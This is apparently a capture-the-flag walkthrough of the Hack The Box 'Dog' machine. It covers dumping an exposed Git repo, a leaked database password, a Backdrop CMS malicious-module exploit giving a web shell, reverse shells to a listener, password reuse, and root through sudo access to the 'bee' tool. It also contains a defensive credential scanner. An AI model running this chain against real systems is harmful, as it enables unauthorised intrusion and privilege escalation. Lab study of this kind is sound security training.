Dog - Easy - Linux

Nmap Scan

The port scan found SSH open and an Apache web server hosting a website, with a Git repository (.git/) exposed under the web root.

# Nmap 7.95 scan initiated Sat Mar  8 15:44:31 2025 as: /usr/lib/nmap/nmap -sCV -p- -v -oN portscan.log 10.10.11.58
Nmap scan report for 10.10.11.58
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  8 15:44:54 2025 -- 1 IP address (1 host up) scanned in 23.65 seconds

Download Git Repo

git-dumper was used to download the repo for further investigation.

┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ git-dumper http://10.10.11.58:80/.git/ .
[-] Testing http://10.10.11.58:80/.git/HEAD [200]
[-] Testing http://10.10.11.58:80/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.58:80/.git/ [200]
[-] Fetching http://10.10.11.58:80/.gitignore [404]
[-] http://10.10.11.58:80/.gitignore responded with status code 404
[-] Fetching http://10.10.11.58:80/.git/COMMIT_EDITMSG [200]
[-] Fetching http://10.10.11.58:80/.git/config [200]
[-] Fetching http://10.10.11.58:80/.git/HEAD [200]

Inspecting Git Repo

The repo contains a copy of the files that are probably in production on the Apache web server. The web application is Backdrop CMS, an open source project, which can be found at the following link:

https://github.com/backdrop

┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ ls -la
total 92
drwxrwxr-x 8 kali kali  4096 Mar 10 00:38 .
drwxrwxr-x 6 kali kali  4096 Mar 10 00:38 ..
drwxrwxr-x 9 kali kali  4096 Mar 10 00:38 core
drwxrwxr-x 7 kali kali  4096 Mar 10 00:38 files
drwxrwxr-x 7 kali kali  4096 Mar 10 00:38 .git
-rwxrwxr-x 1 kali kali   578 Mar 10 00:38 index.php
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 layouts
-rwxrwxr-x 1 kali kali 18092 Mar 10 00:38 LICENSE.txt
-rwxrwxr-x 1 kali kali  5285 Mar 10 00:38 README.md
-rwxrwxr-x 1 kali kali  1198 Mar 10 00:38 robots.txt
-rwxrwxr-x 1 kali kali 21732 Mar 10 00:38 settings.php
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 sites
drwxrwxr-x 2 kali kali  4096 Mar 10 00:38 themes

SQL Configuration File

The following database credentials were discovered in the settings.php file.

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
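
As an added example (not part of the original writeup), the following Python scans a dumped tree such as the git-dumper output above for DSN-style URLs that embed a password, which is exactly how a credential like the one in settings.php ends up committed and served to anyone who can fetch .git/. The sample files and the placeholder password are constructed, not taken from the real repo.

```python
import os
import re
from urllib.parse import urlsplit

# Matches a DSN-style URL whose userinfo carries a password: scheme://user:pass@host/...
DSN_RE = re.compile(r"\b([a-z][a-z0-9+.-]*://[^\s'\"@]+:[^\s'\"@]+@[^\s'\"]+)")

# Constructed sample input standing in for a dumped repo; the password is a placeholder,
# not the value from the real settings.php.
SAMPLE_FILES = {
    "settings.php": (
        "<?php\n"
        "$database = 'mysql://root:PLACEHOLDER_PW@127.0.0.1/backdrop';\n"
        "$database_prefix = '';\n"
    ),
    "files/config/active/update.settings.json": (
        '{\n  "update_url": "https://example.invalid/release-history",\n'
        '  "update_emails": ["user@example.invalid"]\n}\n'
    ),
}


def find_dsn_credentials(files):
    """Return (path, line_no, user, host, redacted_dsn) for each DSN with an embedded password.
    `files` maps a relative path to the file's text (see load_tree for a real directory)."""
    findings = []
    for path, text in files.items():
        for line_no, line in enumerate(text.splitlines(), start=1):
            for match in DSN_RE.finditer(line):
                parts = urlsplit(match.group(1))
                if not parts.password:  # e.g. http://host:8080/path has no userinfo
                    continue
                redacted = match.group(1).replace(parts.password, "***", 1)
                findings.append((path, line_no, parts.username, parts.hostname, redacted))
    return findings


def load_tree(root):
    """Read every file under root (skipping .git internals) into the mapping find_dsn_credentials expects."""
    files = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="ignore") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files


if __name__ == "__main__":
    for path, line_no, user, host, dsn in find_dsn_credentials(SAMPLE_FILES):
        print(f"{path}:{line_no}: database credential for {user}@{host}: {dsn}")
```

Point it at a checkout with `find_dsn_credentials(load_tree("."))` before publishing a site, or at a git-dumper output directory to see what an attacker would have recovered.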

Username Discovery

The following username was discovered by grepping the dumped repo for the dog.htb domain.

┌──(kali㉿kali)-[~/hackthebox/dog/gitdump]
└─$ grep -Ri 'dog.htb' -A5 -B5              
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_url": "",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_not_implemented_url": "https://github.com/backdrop-ops/backdropcms.org/issues/22",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_max_attempts": 2,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_timeout": 30,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_emails": [
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    ],
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_threshold": "all",
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_requirement_type": 0,
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_status": [],
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json-    "update_projects": []
--
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
--
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Inspecting Port 80

Screenshot of the home page.

Testing Credentials

It was possible to log in to the web application with the discovered username and password.

Screenshot of the admin dashboard.

Uploading Malicious Plug-in

After researching known exploits for Backdrop CMS I found the below PoC on ExploitDB.

https://www.exploit-db.com/exploits/52021

The script generates a ZIP file which is then uploaded and installed as a plug-in.

┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ python3 exploit.py http://10.10.11.58
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

Manually Installing Plug-in (ZIP)

After attempting to upload the ZIP file, an error message appeared advising that ZIPs are not supported: the web application expects the plug-in to be contained in a tar archive.

Manually Installing Plug-in (TAR)

To resolve the error I added the plug-in files to a TAR archive instead, which resulted in a successful installation as seen below.

Testing Malicious Plug-in

The web shell is working as expected as seen below.

Reverse Shell Obtained (www-data)

(Screenshots of the reverse shell callback as www-data.)

Password Reuse Test

After gaining a foothold on the system I dumped the SQL database using the credentials discovered in the settings.php file. The hashes did not crack within 5 minutes, so I assumed that was not the way forward. Instead I collected the list of users on the system with shell access and tested the known password against them. It was possible to log in as johncusack using the SQL password.

www-data@dog:/var/www/html/modules/shell$ cat /etc/passwd | grep sh$
cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jobert:x:1000:1000:jobert:/home/jobert:/bin/bash
johncusack:x:1001:1001:,,,:/home/johncusack:/bin/bash
www-data@dog:/var/www/html/modules/shell$ 

SSH access obtained as johncusack. User flag captured.

┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ ssh johncusack@10.10.11.58  
johncusack@10.10.11.58's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Tue 11 Mar 2025 12:20:31 AM UTC

  System load:           0.0
  Usage of /:            49.1% of 6.32GB
  Memory usage:          18%
  Swap usage:            0%
  Processes:             222
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.58
  IPv6 address for eth0: dead:beef::250:56ff:fe94:3fb0


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


johncusack@dog:~$ 

Escalating to Root - Bee Backdrop CMS Tool

After checking sudo access, johncusack could run the bee tool as root. bee ships with Backdrop CMS and is used to manage it. Several of its functions are of interest.

johncusack@dog:/backdrop_tool/bee$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

The below snippet shows the relevant functions of bee. The eval and php-script functions stand out the most, as they could be used to get code execution as root.

 ADVANCED
  db-query
   dbq
   Execute a query using db_query().

  eval
   ev, php-eval
   Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

  php-script
   scr
   Execute an arbitrary PHP file after bootstrapping Backdrop.

  sql
   sqlc, sql-cli, db-cli
   Open an SQL command-line interface using Backdrop's database credentials.

I uploaded a PHP reverse shell and saved it in the /tmp directory. The below snippet shows the result of attempting to use the bee tool with sudo to execute the reverse shell. It failed due to a bootstrap error. I struggled to figure out why it kept failing, and after researching bee I learned that it expects to be executed from the working directory of a Backdrop CMS install.

johncusack@dog:/backdrop_tool/bee$ sudo bee php-script /tmp/phpshell.php 

 ✘  The required bootstrap level for 'php-script' is not ready. 

After changing the current working directory to /var/www/html, where Backdrop CMS was already installed, the results were better. The error message no longer appeared and the reverse shell was executed with sudo.

johncusack@dog:/var/www/html$ sudo bee php-script /tmp/phpshell.php 
johncusack@dog:/var/www/html$ 
 ℹ  Notice: Undefined variable: daemon
in printit() (line 184 of /tmp/phpshell.php).

Successfully opened reverse shell to 10.10.14.16:9001

Root Shell Obtained

The callback was successful. Root flag captured.

┌──(kali㉿kali)-[~/hackthebox/dog]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.58] 34386
Linux dog 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
 00:24:17 up  4:48,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
johncusa pts/0    10.10.14.16      00:20    1.00s  0.06s  0.06s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
8bb13980f98142b836028fc4e6f77d9a
# id
uid=0(root) gid=0(root) groups=0(root)
This post is licensed under CC BY 4.0 by the author.